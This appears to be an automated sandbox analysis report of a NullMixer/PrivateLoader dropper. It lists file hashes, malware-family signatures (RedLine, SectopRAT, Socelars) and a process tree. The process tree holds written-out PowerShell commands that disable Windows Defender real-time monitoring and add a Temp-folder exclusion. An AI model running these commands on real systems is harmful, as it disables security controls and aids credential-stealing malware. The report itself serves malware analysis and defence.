memory/4132-256-0x00000000072A0000-0x00000000072A8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6Q6HY.Re
| MD5 | 05e4ce7aaf4c9c2a0bb4399b9d01208d |
| SHA1 | 1f2a1a8356e2d909943bbcae8efbe032854fa831 |
| SHA256 | 374202f3e07fab4202655ea39339f88829a4702cb8f92ab6a2705a6e3aae0d36 |
| SHA512 | 9a8e0806c99cbbef62ac294fc8d9aa5dc1d0060f57ff075650dd58a375b7f309377c52c1154be1f394694fde994615b68b882f4be9b18abf8f34cef1096d3543 |
C:\Users\Admin\AppData\Local\Temp\ISA502G.S7
| MD5 | 5d2571a51baa9b38d7180dbde1ebde3a |
| SHA1 | 4752e60d9ce426a82160a4da90c12a0a60487e75 |
| SHA256 | 9d5629b87d747c1791fe07e8efc410f5e8b0626033be586d83f549db50d527be |
| SHA512 | b59c4d7e6bc54be57934c659b37084f52cadc861746eccdd86ed6e0a0e862005dbf3716d171db773e77df99d015dfaf80b4273f8798c9e224376d1c44a2e8e50 |
memory/1256-262-0x00000000026B0000-0x0000000002845000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 296ea7df007b307cb61e80ed6a05e875 |
| SHA1 | 3dd71ddc45f20b070915f47c1253c4dd5138c8a5 |
| SHA256 | 6eeedbc1e3770e55a7d8755fdf7c17cc60b914538a75d56c3899db41c789780b |
| SHA512 | 5da5171ac004f748c8800c51c8820dcf78511cac255423f8be7c695e915c8f5df99b14ecc3c91278d73f00dfb46282a480b87364f87e810543072eb69adf91b7 |
C:\Users\Admin\AppData\Local\Temp\y~A7gjIO.E
| MD5 | 4db3690c9cf2525f1919181be7200189 |
| SHA1 | 29889e5a2e8e1030c1c8517b24c44c3b555a296f |
| SHA256 | 721160b9f762c517522c56326e9040fa1457703a9aead210a4b2905a5122957c |
| SHA512 | aafda968325d1501066979771fb137cc354120de81d0aa9ccbc407ced9aceba1f3fd984f4857aa00424156bd6afd054515cc8f856e2750aaee7be5d242b90d51 |
C:\Users\Admin\AppData\Local\Temp\Dema.eP
| MD5 | 692db0108f3840d6536e482ab44a8ddd |
| SHA1 | 18062c95b2d2c7864973d6c40f76e3b6a448c58e |
| SHA256 | 0f6161b3927445039e7297404b841a7ea6968d88ce80d618307ea744d1b7af11 |
| SHA512 | 48bf5c14de18f77e731b86c919089429a9ace6f9edf93e6bcb73ca614edcf10a387b7737b85d3730036e35db09ff68c02e6c538228cb3ae48bf20e879ea0509e |
memory/1256-275-0x0000000002C30000-0x0000000002CD5000-memory.dmp
memory/1256-282-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1256-279-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1732-283-0x0000000000400000-0x0000000002F21000-memory.dmp
memory/4380-287-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/4600-286-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 605b50d3a433c4ce3111c0aed99efc71 |
| SHA1 | bd1852cdfe9282965cf68ecaedcaa1a880e44f63 |
| SHA256 | 4d461bbc08f1710b05723f7cf0499d483013c3bae2efc8415b25fed4dc8f8396 |
| SHA512 | dea6a503a52c3d459e04963687cc18ad59fd103b1c0decdf4f834974e714fce524267452669e9b4b892ea7b1a26e1c2624a1f92c1d0bfad60aec8b7a5bcbb21e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/1256-303-0x00000000026B0000-0x0000000002845000-memory.dmp
memory/1732-304-0x0000000000400000-0x0000000002F21000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | bb1bf2dac516fe4ffd11e3d3d025fd4e |
| SHA1 | 536216889810b6a6c5f39457dcb384bf61d2f22a |
| SHA256 | e0c8d72d967c8a1adaccba01caef39aba2c18d5415cb6acd420b12561a18c354 |
| SHA512 | 6dafcdfdde62cf57a4fbde4e4fd72e06d58c73f57096befa88d8f935c38a204846a50c81e1ad1113b911af1a0bc269bee79822fca882e1ddf423031feecee0e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d8a7eb78185ede0c64accddeb8ab0482 |
| SHA1 | c136be978dfb3ad62a23a2c6ca1c4d2a1ece1ee4 |
| SHA256 | 43b398b5ba617bf889d63e1f9093c69d25d43ca98496d38c4ad58a088e01f154 |
| SHA512 | b9d98d2bc0d66d27f6700a6cad501f942b855e6d725796e782585851441b25874823b6012b60abed47d4f0496f3d5e6510a59658cbd07cf044c846593e352433 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 11efaec7e0b55372d55efe3a892d047a |
| SHA1 | ba600bed4d894090a2e76dc4e361cfd84a42f2fe |
| SHA256 | 94b1993f363de64e4650fde3e8d50d246b23289cddd170eb4dcb1c2590212157 |
| SHA512 | f0f612b5dfd1d209039828657a96e846f0b8ecf1f51f70d641e93f578439d23d1d5b573358ac30ace4c286ab3ba39f9afe2cfb9fc19106085602657dfaa1cf7b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 36e6e3aed9cf36e5cbf572f21c8a0279 |
| SHA1 | 89106ab5120e5c794dbc32e7f51affcff70994da |
| SHA256 | 799cdf3785c64107ab23d3a45730d0004b8a0182fdf2af75a47a661c273c3b3d |
| SHA512 | c524642a682d7da568c7f26af49a0a1a0759560bff177c44284bf61760f3ea4ff54ecb9d72cb5f20befe6f73f2dfdd18998648cdfb42741e8b5ed9dbbc56509f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | de7541625e41b14d55dff4b9b0e9654c |
| SHA1 | 29a1eb34bf62d33133be124ddca63a2104004a66 |
| SHA256 | f24fb9832e59406319fe9a03a45961bcc904922397c83f5e24b0b5a8d825e053 |
| SHA512 | 2c4a911902f56ac495e384eb67f076d1273c08aedb9ea81d32ca6abacd0c24580b93b59f766309b3d81bd08bf00dc9287859f452d4a9c5aee1d9a1fb299cfddf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2563d71430e533411340760948dbf8a6 |
| SHA1 | 16d5a871ee1cae7268b329f98505c62d216ffbeb |
| SHA256 | 0064b418c9fe76c2d4ff1764c0cf9db362b98234df3582e1f979bfe5addab297 |
| SHA512 | b0c0072620c546af69c8afd8a00d4d1135bf49e48a71ab658ece943082d49698bb67c2a4eeb935215dab2b1898200e51936da04056ec52e34075fa673f16215f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 5ca1629a2651ea56fd186ffe1cd64764 |
| SHA1 | e3983b99faae1b433879989a2a3778752775908e |
| SHA256 | f38cc27069e9b945d01e6d810acd50457b5f58555cfbf9c3472d42b0dc299cff |
| SHA512 | 4819e083a12642666358b144a4ac42a4e16879ac06bee36a23144f0e64d4627fb6818395f90adbaa706bb8a14df729a1541316ab63379df6dc2161d63037e502 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e2dae626babe253704ab21c5dd47d7f8 |
| SHA1 | fe51f1a63fe8895df52936ad59791217f0b110b9 |
| SHA256 | 08ec2520ab447c009d82f1f8cabcffc4f7215e16624c37238f69bbabe65320a5 |
| SHA512 | 0e5262d410915f659e588d0570aa318a14a223c9d1e46f56f402a86aee7b91869e385559e66e7aabc7682cabaa84035881e75fd7d81f42b6584a73026133c3c2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 6ed87b5804c171802330662469f422a5 |
| SHA1 | dee288e90deb2cfabf458b6b8238e1e1530c80e0 |
| SHA256 | 668561b71c40ff9692561599cd1b1eb602a88bf326ddc6a8b9a0ab7efd336fbb |
| SHA512 | 17039c1cc596e329eee6188aea59b00731f3da1f5a530c3186f38fbbdf93a6ab9fd4301cb6fda08a963c7a6372a1a19983da48b6b8b605a2a6d633f1df7ae84e |
memory/1256-397-0x0000000002CE0000-0x0000000002D72000-memory.dmp
memory/1256-398-0x0000000002D80000-0x0000000003B98000-memory.dmp
memory/1256-399-0x0000000003BA0000-0x0000000003C2B000-memory.dmp
memory/1256-400-0x0000000003C30000-0x0000000003CB7000-memory.dmp
memory/1256-403-0x0000000003C30000-0x0000000003CB7000-memory.dmp
memory/1256-404-0x00000000002E0000-0x00000000002E1000-memory.dmp
memory/1256-405-0x00000000002F0000-0x00000000002F4000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3ca89e15aef94fc49ef3ec7d9e78d23a |
| SHA1 | cd35f76e0f0d6c193ad3ba8b22a5b01c2582a2b5 |
| SHA256 | 1b3a199ad2bc21e10e7e4fa9a00f3549c4f00665725711c16b823765d0703890 |
| SHA512 | 57029bc67808c8c71a00e5b5c74487652fbdeafa49f92597a4e308db418fac85ad139608564095c2e9007b21978e7592caab49f808a60c38dbd3c51411e35e21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 60d2983fefd991bee7e9f60e0cd0b3e6 |
| SHA1 | c8da4806bd8950e9e33a21c39b287dfde9c23c5f |
| SHA256 | 0653646c00f9863684f633131de9f9cd02c60bd0e7c02aa40fc1655e371b0440 |
| SHA512 | 714d21c7afebe7b1b47c81109a6bd8b2f48d9027af2d11e78b4c6701fd41eef2dca2a3618e9e4cf09539f468e84eecab767537f055e8f34904da91fc83dfc450 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | ea0c592c1dcff334387f093b97c0fd0e |
| SHA1 | f125c5150b20874cfdc1eb926583aa508ff5260e |
| SHA256 | 802fbbf24f18cb3c47fe92175eb62c11f6efcc2ead6b5036300e0d2767a76655 |
| SHA512 | 16420266e71975fead48474663efa5d12fc431d4dae36b15acec51d8b8f8ab2b8d67830c11bc70ff2809097e315efa493e9cbcdef4f366af019335db0a58c297 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 113b143568d7dcd7092e5d314ba8c574 |
| SHA1 | 3923cc66857050202c15d83d92ce8aa851356130 |
| SHA256 | 8a3b21e7eedc9986e44a168f9a5141e53d8b0e882bd2ca6f3870db68eaad1ad4 |
| SHA512 | 4342fd78ac9fd53cd635ef86ba6ceebfe52b63d51bdd80de158553918c2db72f24fb47b8d54e6a9fdaf82dbca828d428e07e36fe44e9c3c1859908efcaacd770 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-22 07:31
Reported
2024-11-22 07:33
Platform
win7-20240729-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2072 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe |
| PID 2116 set thread context of 2808 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe |
| PID 1724 set thread context of 1640 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe
"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS44A6CE57\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\is-C3FQG.tmp\Thu125e541847539.tmp
